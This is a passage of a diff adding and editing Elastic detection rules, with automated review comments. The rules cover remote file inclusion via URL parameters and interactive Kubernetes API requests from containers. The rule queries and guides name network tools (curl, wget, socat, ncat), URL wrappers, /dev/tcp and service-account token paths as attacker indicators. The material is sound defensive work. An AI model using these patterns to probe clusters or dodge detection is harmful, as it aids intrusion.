+- Review adjacent web access entries from the same source IP and user agent to detect scanning behavior, varied include parameters, wrapper strings (php://, data://, file://), or local file probes that indicate exploitation attempts.
+- Check the referenced remote domain or IP with threat intelligence, and if needed, safely retrieve it in an isolated environment to examine content, redirects, and headers for droppers or callbacks.
+- Look for post-inclusion artifacts by checking webroot and temp directories for newly created or modified files, suspicious script writes, and unusual access patterns, and inspect server or application configuration for risky URL include settings.
+
+### False positive analysis
+
+- Applications that legitimately accept full URLs in query parameters for link previews, content proxies, image fetching, or feed importers (e.g., url= or src=) will return 200 and match *=http(s)://*, appearing as RFI despite expected behavior.
+- Administrative or diagnostic endpoints that allow users to supply IP addresses or URI schemes (ftp://, smb://, file://) to test connectivity or preview resources (e.g., target=192.168.1.10) can return 200 and trigger this rule even though no inclusion vulnerability is present.
+
+### Response and remediation
+
+- Immediately block offending source IPs and request patterns at the WAF/reverse proxy (e.g., GETs where page=, url=, or src= contains http://, https://, ftp://, smb://, or file://) and temporarily disable the affected include/loader endpoints until fixed.
+- Restrict outbound connections from the web server to the domains and IPs referenced in the requests and quarantine the host if 200 OK responses align with remote downloads or wrapper usage such as php://, data://, file://.
+- Collect forensic images, then remove newly created or modified scripts in webroot and temp directories (e.g., /var/www, uploads, /tmp), delete unauthorized .htaccess/web.config entries, clear caches, and terminate suspicious processes running under the web server account.
+- Redeploy the application from a known-good build, restore clean configuration files, rotate credentials exposed by local file probes (e.g., config.php, .env), invalidate sessions, and verify functionality before returning the service to production.
+- Harden by disabling risky features and enforcing strict input controls: set PHP allow_url_include=Off and allow_url_fopen=Off, apply open_basedir restrictions, implement scheme/domain allowlists for any include/load functionality, and sanitize and normalize user-supplied parameters.
+- Escalate to incident response and preserve disk and memory images if remote content was fetched and executed, a webshell or unknown script is found in the webroot, or the same actor generates successful 200 RFI-style requests across multiple hosts.
+- Enhance monitoring for RFI attempts by tuning WAF rules to alert on suspicious include parameters, enabling detailed web server logging, and setting up alerts for anomalous outbound connections from web servers.
+""" +risk_score = 21 +rule_id = "45d099b4-a12e-4913-951c-0129f73efb41" +severity = "low" +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "esql" +query = ''' +from + logs-nginx.access-*, + logs-apache.access-*, + logs-apache_tomcat.access-*, + logs-iis.access-*, + logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code == 200 and + url.original like "*=*" + +| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original)) + +| where + Esql.url_original_url_decoded_to_lower like "*=http://*" or + Esql.url_original_url_decoded_to_lower like "*=https://*" or + Esql.url_original_url_decoded_to_lower like "*=ftp://*" or + Esql.url_original_url_decoded_to_lower like "*=smb://*" or + Esql.url_original_url_decoded_to_lower like "*=file://*" or + Esql.url_original_url_decoded_to_lower rlike """.*=.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*""" + +| keep + @timestamp, + Esql.url_original_url_decoded_to_lower, + source.ip, + agent.id, + agent.name, + http.request.method, + http.response.status_code, + event.dataset, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by 
source.ip +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml index 7b5a138dd69..8934cb47811 100644 --- a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml +++ b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/23" integration = ["aws", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/23" [rule] author = ["Elastic"] @@ -77,7 +77,22 @@ references = [ risk_score = 47 rule_id = "a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS EC2", "Data Source: AWS SSM", "Data Source: AWS Systems Manager", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS EC2", + "Data Source: AWS SSM", + "Data Source: AWS Systems Manager", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
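Review bot: `updated_date` in the `@@ -2,7 +2,7 @@` hunk of execution_aws_ec2_lolbin_via_ssm.toml moves backwards, from "2026/03/23" to "2025/11/23", which is the file's own `creation_date`, while the later hunks of the same file change its tags and threat mapping. That reads like an older copy of the file being committed over a newer one rather than an intended edit; the line should stay `updated_date = "2026/03/23"` or carry the date of this change. If the repository validates `updated_date` against content changes, this regression may also trip that check.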
@@ -210,23 +225,26 @@ FROM logs-aws.cloudtrail*, logs-endpoint.events.process-* METADATA _id, _version [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1651" name = "Cloud Administration Command" reference = "https://attack.mitre.org/techniques/T1651/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml new file mode 100644 index 00000000000..13d278cd24c --- /dev/null +++ b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml 
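Review bot: The added `[[rule.threat]]` block at the end of this hunk is laid out differently from the existing block above it: no blank line between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]`, two blank lines before `[rule.threat.tactic]`, and a trailing blank line at end of file. Every other threat section in this diff uses a single blank line between tables and none after the last one, so the new block should follow that layout. Removing the T1059/T1059.004 (Unix Shell) mapping from the Execution entry is presumably deliberate, but it goes beyond the tag and tactic update the rest of the file shows and is worth confirming, since the rule's file name still describes shell-based living-off-the-land execution.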
@@ -0,0 +1,140 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct +interactive Kubernetes API requests. An adversary may need to execute direct interactive Kubernetes API requests to gain +access to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate +the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within +the cluster. Note that this rule may not trigger if the authorization token of the request is expanded within the process +argument list, as the length of the "process.args" field may lead to the field being ignored. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Direct Interactive Kubernetes API Request by Common Utilities" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Direct Interactive Kubernetes API Request by Common Utilities + +This detection links an interactive invocation of common networking utilities or kubectl inside a container to a near-simultaneous Kubernetes API response, indicating hands-on-keyboard access to the API server for discovery or lateral movement. A common attacker pattern is compromising a pod, reading its mounted service account token, then running curl or kubectl interactively to query /api or /apis endpoints to list pods and secrets and map cluster scope. + +### Possible investigation steps + +- From Kubernetes audit logs linked to the pod, capture the authenticated principal, namespace, verbs, and request URIs to determine whether the activity focused on discovery or sensitive resources like secrets or RBAC objects. +- Correlate the interactive container activity with kubelet exec/attach or terminal session telemetry to identify who initiated the session and through which source IP or control-plane endpoint. +- Inspect the pod’s service account by validating access to the mounted token path and enumerating its RoleBindings and ClusterRoleBindings to quantify effective privileges and decide on immediate revocation or rotation. +- Review the container image provenance and available shell history or command logs to confirm use of networking utilities or kubectl and identify any reads of secrets, kubeconfig files, or /api and /apis endpoints. +- Expand the time window to find prior or subsequent API calls from the same pod, namespace, or node, and quarantine or cordon the workload if you observe sustained enumeration or cross-namespace access. 
+ +### False positive analysis + +- An operator uses kubectl exec -it to enter a pod and runs kubectl or curl to list resources or verify RBAC, producing interactive process starts and near-simultaneous Kubernetes audit responses that are expected during troubleshooting. +- During routine connectivity or certificate checks, an engineer attaches to a container that includes curl/openssl/socat/ncat and interactively tests the Kubernetes API server endpoint, generating correlated audit events without malicious intent. + +### Response and remediation + +- Immediately isolate the implicated pod by terminating the interactive shell and curl/kubectl processes, applying a deny-all NetworkPolicy in its namespace, and temporarily blocking pod egress to the kube-apiserver address. +- Revoke and rotate the service account credentials used by the pod, invalidate the token at /var/run/secrets/kubernetes.io/serviceaccount/token, and remove excess RoleBindings or ClusterRoleBindings tied to that identity. +- Delete and restore the workload from a trusted image that excludes curl/wget/openssl/socat/ncat, with automountServiceAccountToken disabled and least-privilege RBAC enforced. +- Escalate to incident response if the pod read Secrets or ConfigMaps, modified RBAC objects, attempted create/patch/delete on cluster-scoped resources, or originated from an unapproved operator workstation or bastion. +- Harden by restricting kubectl exec/attach to a small admin group with MFA, enabling admission controls (Pod Security Admission, Gatekeeper, or Kyverno) to block shells or kubectl/netcat in images, and applying egress NetworkPolicies so only approved namespaces can reach https://kubernetes.default.svc. 
+""" +risk_score = 47 +rule_id = "9d312839-339a-4e10-af2e-a49b15b15d13" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", + "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) + ) and process.interactive == true and container.id like "*" + ] by orchestrator.resource.name + [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by 
`kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml new file mode 100644 index 00000000000..211a1183c0f --- /dev/null +++ b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml 
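Review bot: In the `process` subsequence, `ssl_client` and its absolute paths are listed in the `process.args in (...)` list for shell and busybox parents, but `ssl_client` is missing from `process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl")`, so a direct `ssl_client` exec (busybox applets are commonly reached through symlinks that set the process name) is treated inconsistently with the same tool launched via a shell. The two lists should agree; add `"ssl_client"` to the `process.name` list or drop it from the args list, and apply the same change to the identical block copied into the two following new rules in this diff. Separately, the sequence joins on pod name only (`orchestrator.resource.name` against the `.../pod-name` audit extra) and the `false_positives` text already acknowledges cross-correlation between same-named pods; if the Defend for Containers process event exposes a namespace field, joining on it as a second key would remove that class of false positive.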
@@ -0,0 +1,144 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of forbidden +interactive Kubernetes API requests. An adversary may need to execute interactive Kubernetes API requests to gain access +to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate the +Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within the +cluster. Attackers may attempt to access resources that are forbidden by the authorization policy. Note that this rule may +not trigger if the authorization token of the request is expanded within the process argument list, as the length of the +"process.args" field may lead to the field being ignored. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. 
+ """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Forbidden Direct Interactive Kubernetes API Request" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Forbidden Direct Interactive Kubernetes API Request + +This rule correlates an interactive command execution inside a container with a Kubernetes API request that is explicitly forbidden, signaling hands-on-keyboard probing and unauthorized access attempts. It matters because attackers use live shells to enumerate cluster resources and test privileges for lateral movement or escalation. Example: after compromising a pod, an operator opens a shell and runs kubectl get secrets or curls the API server with the pod’s token, repeatedly receiving 403 Forbidden. + +### Possible investigation steps + +- Correlate the pod, container, namespace, node, and service account from the alert, then quickly pull the matching audit entries to see the verb, resource, requestURI, and userAgent for the forbidden calls. +- Determine whether the container image normally includes utilities like kubectl/curl/openssl or if they were dropped into the pod, and review recent file writes and package installs to differentiate admin debugging from hands-on-keyboard activity. +- Inspect the pod’s service account bindings and effective RBAC in the target namespace to confirm least privilege and understand why the request was denied, then check for other successful API requests from the same identity around the same timeframe. 
+- Review network connections from the pod to the API server (and any proxies) during the session to validate direct access paths, source IPs, and whether a mounted service account token from /var/run/secrets was used. +- Validate whether this was an authorized SRE/debug session by contacting the workload owner and checking for recent kubectl exec or ephemeral debug activity; if not expected, expand the search for similar forbidden attempts from other pods. + +### False positive analysis + +- An authorized kubectl exec or ephemeral debug session inside a pod where an engineer runs kubectl or curl to probe API resources and, because the pod’s service account is intentionally least‑privileged, the requests are forbidden as expected. +- Benign interactive troubleshooting that mistakenly uses the wrong namespace or queries cluster‑scoped endpoints from within the container (e.g., curl/openssl to the API server), causing the audit logs to show forbid decisions even though no malicious access was attempted. + +### Response and remediation + +- Immediately terminate the interactive shell (e.g., sh/bash) in the offending container and isolate the pod by applying a deny-egress NetworkPolicy in its namespace that blocks outbound connections to https://kubernetes.default.svc and the API server IPs. +- Revoke and rotate credentials by deleting the pod and its ServiceAccount token Secret, temporarily setting automountServiceAccountToken: false on the workload, and redeploying with a new ServiceAccount after validating RBAC least privilege. +- Remove attacker tooling and persistence by rebuilding the container image to exclude kubectl/curl/openssl/socat/ncat, clearing writable volume mounts that contain dropped binaries or scripts, and redeploying from a trusted registry. 
+- Sweep for spread by identifying pods running the same image or on the same node and terminating any interactive processes issuing Kubernetes API requests from within containers, then restart those workloads cleanly. +- Escalate to incident response if you observe successful API operations (200/201) on secrets, configmaps, or RBAC objects, exec into other pods, or privileged container settings (privileged=true, hostNetwork, or hostPID), indicating lateral movement or credential compromise. +- Harden going forward by tightening RBAC on the new ServiceAccount, enforcing Gatekeeper/OPA policies to deny images that include kubectl/curl and block interactive shells, setting readOnlyRootFilesystem and dropping NET_ADMIN, and restricting API server access via egress controls. +""" +risk_score = 47 +rule_id = "5d1c962d-5d2a-48d4-bdcf-e980e3914947" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", + "socat", "/bin/socat", "/usr/bin/socat", 
"/usr/local/bin/socat", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) + ) and process.interactive == true and container.id like "*" + ] by orchestrator.resource.name + [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted") and + `kubernetes.audit.annotations.authorization_k8s_io/decision` == "forbid" + ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml new file mode 100644 index 00000000000..652be9cb05b --- /dev/null 
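Review bot: Every sequence this rule matches is also matched by the "Direct Interactive Kubernetes API Request by Common Utilities" rule added earlier in this diff, because that rule's audit subsequence filters only on dataset and stage with no `authorization_k8s_io/decision` condition, and both rules carry the same `risk_score = 47`, severity, tags and threat mapping. A single 403 probe from curl or kubectl in a pod therefore raises two indistinguishable alerts. If this rule is meant to be the more specific signal, the common-utilities rule could exclude `forbid` decisions in its audit subsequence, or this rule's risk score could be raised so the pair is distinguishable in triage. The process-side block is byte-identical to the sibling rules, so any fix to its tool lists should be applied to all three.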
+++ b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml 
@@ -0,0 +1,164 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend", "kubernetes"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct +interactive Kubernetes API requests via unusual utilities. An adversary may need to execute direct interactive Kubernetes +API requests to gain access to the Kubernetes API server or other resources within the cluster. These requests are often +used to enumerate the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move +laterally within the cluster. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, + """ + There is a risk of false positives if there are several containers named the same, as the rule may correlate the request + to the wrong container. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Direct Interactive Kubernetes API Request by Unusual Utilities" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. 
+ +### Investigating Direct Interactive Kubernetes API Request by Unusual Utilities + +This rule detects interactive commands executed inside containers that use atypical utilities to hit the Kubernetes API, paired with near-simultaneous API activity on pods, secrets, service accounts, roles/bindings, or pod exec/attach/log/portforward. It surfaces hands-on-keyboard discovery and lateral movement using custom scripts that evade common tool allowlists; for example, an intruder opens a shell in a pod, uses Python to query the in-cluster API to list secrets, then triggers pods/exec to pivot into another workload. + +### Possible investigation steps + +- Identify the implicated pod, container image, and executing service account, then quickly review its RBAC bindings and effective permissions to determine blast radius. +- Inspect the container’s interactive session context by pulling recent command lines, shell history, environment variables, and mounted service account tokens, and look for custom scripts or binaries issuing HTTP requests. +- Correlate nearby Kubernetes audit entries tied to the same principal and pod to map accessed resources and verbs, noting any exec/attach/portforward or sensitive object interactions across namespaces. +- Review network activity from the pod to the API server and any in-pod proxies, including DNS lookups and outbound connections, to spot nonstandard clients or tunneling behavior. +- If suspicious, isolate the pod or node, capture runtime artifacts (e.g., process memory or HTTP client traffic), revoke and rotate the service account credentials, and verify image provenance and integrity. + +### False positive analysis + +- An operator interactively attaches to a pod and uses a Python REPL or bash with /dev/tcp to call the in-cluster API for routine troubleshooting (e.g., list pods, read ConfigMaps, or run selfsubjectaccessreviews), producing normal audit entries that match the rule signature. 
+- A correlation artifact arises when two namespaces have pods with the same name: one pod starts an interactive shell while another independently performs get/list/watch calls, and the 1-second sequence keyed only on pod-name links the unrelated events. + +### Response and remediation + +- Immediately isolate the implicated pod that issued direct API calls using a nonstandard utility by applying a deny-all egress NetworkPolicy in its namespace (including to kubernetes.default.svc:443), terminating the interactive session, and scaling its owning Deployment/Job/StatefulSet to zero replicas. +- Before teardown, capture a runtime snapshot of the container and node including the binary or script used to query the API (e.g., files under /tmp or /dev/tcp usage), shell history, environment, and the mounted service account token and CA bundle at /var/run/secrets/kubernetes.io/serviceaccount/. +- Revoke access by removing the service account’s RoleBindings/ClusterRoleBindings, deleting all pods that mount that service account to force token rotation, rotating any Secrets and ConfigMaps that were read or created during the window, and deleting any unauthorized Jobs, CronJobs, or Deployments created by the same principal. +- Restore workloads from a known-good image digest, re-enable the Deployment only after image scan and integrity checks pass, and monitor subsequent Kubernetes audit logs for pods/exec, portforward, and access to secrets across the affected namespaces. +- Escalate to incident response leadership and consider cluster-wide containment if audit logs show create/patch of ClusterRoleBindings, access to secrets outside the workload’s namespace, or use of pods/exec to pivot into other nodes or system namespaces such as kube-system. 
+- Harden access by enforcing least-privilege RBAC that denies pods/exec and attach for application service accounts, setting automountServiceAccountToken: false on workloads that do not need it, restricting egress to the API server with NetworkPolicies, and requiring just-in-time break-glass roles for interactive access. +""" +risk_score = 21 +rule_id = "02275e05-57a1-46ab-a443-7fb444da6b28" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Data Source: Kubernetes", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.interactive == true and + container.id like "*" and + /* Covered by the rule "Direct Interactive Kubernetes API Request by Common Utilities" */ + not ( + process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", + "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", 
"/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) or + /* General exclusions for utilities that are not typically used for Kubernetes API requests */ + process.name in ( + "sleep", "head", "tail", "apk", "apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf", + "pacman", "rpm", "dpkg" + ) + )] by orchestrator.resource.name + [any where + event.dataset == "kubernetes.audit_logs" and + kubernetes.audit.stage in ("ResponseStarted","ResponseComplete") and + kubernetes.audit.verb in ("get", "list", "watch", "create", "patch", "update") and + ( + kubernetes.audit.objectRef.resource in ( + "pods", "secrets", "serviceaccounts", "configmaps", + "roles", "rolebindings", "clusterroles", "clusterrolebindings", + "deployments", "daemonsets", "statefulsets", "jobs", "cronjobs", + "nodes", "namespaces", + "selfsubjectaccessreviews", "selfsubjectrulesreviews", "subjectaccessreviews" + ) + or ( + kubernetes.audit.objectRef.resource == "pods" and + kubernetes.audit.objectRef.subresource in ("exec", "attach", "portforward", "log") + ) + ) + ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" 